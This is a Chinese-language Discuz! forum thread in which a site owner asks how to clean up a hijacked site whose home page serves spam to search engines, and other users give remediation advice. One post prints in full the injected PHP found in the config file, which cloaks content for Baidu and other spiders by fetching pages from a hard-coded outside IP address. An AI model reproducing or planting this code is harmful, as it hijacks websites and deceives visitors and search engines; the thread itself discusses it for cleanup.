Discuz! 官方站

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1338|回复: 8

[新需求] 网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?

[复制链接]
发表于 2020-11-29 23:20:07 | 显示全部楼层 |阅读模式
需求发布
金额范围: 50-100 元
预算金额: 50 元
开始时间:
结束时间:
联系方式: 隐藏内容
网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?
, A4 }0 U  }3 A2 M) W# `0 F
* I/ p  R# B! {网站被劫持后生成了大量首页php后面加任意字符都还是可以访问
+ t3 \( @" |1 R% n百度收录大量的这样帖子) i5 a* l7 ]- E9 {% k; w, C

; z% R/ r# k" Q7 [6 f现在如何解决这样的?2 W3 z, y0 H& s, ~  u" w
' F. `" `6 b2 o) \& Q! s) M1 d
宝塔面板。。。。。。
# L* ]* a1 y+ ?. F1 o3 {0 _/ b* d6 S0 H7 |9 c/ I6 ^- S$ l' r
如/forum.php?123456
* g" H9 D% Y& \. T; c/forum.php?12365
( \' z9 O( D7 [5 ^! g/forum.php?5151513 P! \( K% t' O; p% v3 I& Y2 t

1 c3 ?0 r& m8 i1 c% L随便加都可以访问,只有首页而已其他文章帖子加就不可以。。。
1 n. m3 r# y& A% _$ U6 Q
 楼主| 发表于 2020-11-30 00:17:02 | 显示全部楼层

/ K0 G* H0 j2 |! B#set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://156.226.52.130");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".html")or  $tr(url,".doc")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://156.226.52.130/404.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://156.226.52.130/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}1 r! y7 I4 [9 @3 D' X, ~' i0 {7 e
// --------------------------  CONFIG ADMINCP  -------------------------- //
8 ^5 }5 W/ A* @- J4 I// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //  V# P+ x4 N% M
回复

使用道具 举报

发表于 2020-11-30 06:34:12 | 显示全部楼层
这个是加什么都可以访问,出现这种字符的原因解决了就好了。Q3160510998
回复

使用道具 举报

发表于 2020-11-30 11:16:25 | 显示全部楼层
你找到了劫持代码 并没有找到后门在哪,还是会出现的
回复

使用道具 举报

 楼主| 发表于 2020-11-30 11:34:07 | 显示全部楼层
cardz! 发表于 2020-11-30 06:34& X% f! Z0 _8 Y/ Y& F9 P) b
这个是加什么都可以访问,出现这种字符的原因解决了就好了。Q3160510998
5 z  K" i2 ]! ~' r2 s0 L; m' p
啥原因呀?现在是加啥都还可以访问..
回复

使用道具 举报

发表于 2020-11-30 13:54:57 | 显示全部楼层
1270643127 发表于 2020-11-30 11:34; i$ [! w6 U' s) [
啥原因呀?现在是加啥都还可以访问..
( q, f5 Y2 X7 x  }
谁的都可以,不只是你的。
回复

使用道具 举报

 楼主| 发表于 2020-11-30 17:40:38 | 显示全部楼层
cardz! 发表于 2020-11-30 13:54: ?, {7 }! b, K' _' P4 W
谁的都可以,不只是你的。

4 Z5 T, g, f) E5 k2 w那不是不能解决了?已经收录了好多了
回复

使用道具 举报

发表于 2020-12-12 18:45:36 | 显示全部楼层
1270643127 发表于 2020-11-30 17:40
. _+ Q- E" r& W' c8 q( b那不是不能解决了?已经收录了好多了

/ e+ C9 R7 W  ~你先把config里边那段代码删除,然后还要检查最近新增和修改的文件# x# s; p* f) F5 x( Z

9 M3 j, [1 S$ z你去做一个抓取测试(你自己正常访问页面,是正常的,但是蜘蛛访问,是另外一个样子)
  t6 H0 N: t6 i1 v+ v5 L$ [; O如果没有注册百度站长或者百度统计,就去下面这个网址,也可以9 ]6 G+ I# d  s; N6 q+ \
  1. http://stool.chinaz.com/tools/webcheck.aspx
复制代码
9 h5 {/ j" \& n9 Y% Y+ k

& F& k! W1 f! y+ [4 E如果以前的那些页面依然有问题,就说明你没有清除干净(也算不上清除干净,你删除了恶意代码,但是后门还是在的)
! X8 M$ O5 g. P0 d% d8 @
$ v3 m5 ?/ m: Q2 @6 V2 V. e我自己网站的黑链网址是/?s***.后缀   清除之后,这些页面就不能访问了,然后你可以去百度提交死链,删除这些快照。当然啦,我很早以前就在robots里边直接屏蔽了【?】 所以被挂黑链半个月,百度 根本没有收录黑链。然后我发现黑链之后,直接去百度申请闭站了,解决完了才恢复的
回复

使用道具 举报

发表于 2020-12-12 18:47:55 | 显示全部楼层
而且你使用宝塔,宝塔有免费防火墙,你可以把恶意代码的一些关键词,比如“156.226.52.130” “$tr(url” 直接添加到防火墙。并且,定期扫描(扫描结果要分析哈,DZ默认的某些文件也会被扫描出有问题,但是并不是真的有问题)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Discuz! Q 1.0 正式发布,5 分钟快速生成粉丝社区,助力内容创作者快速变现

小黑屋|Discuz! 官方站 ( 粤B2-20090059-165 )star

GMT+8, 2021-1-18 10:11 , Processed in 0.060755 second(s), 15 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表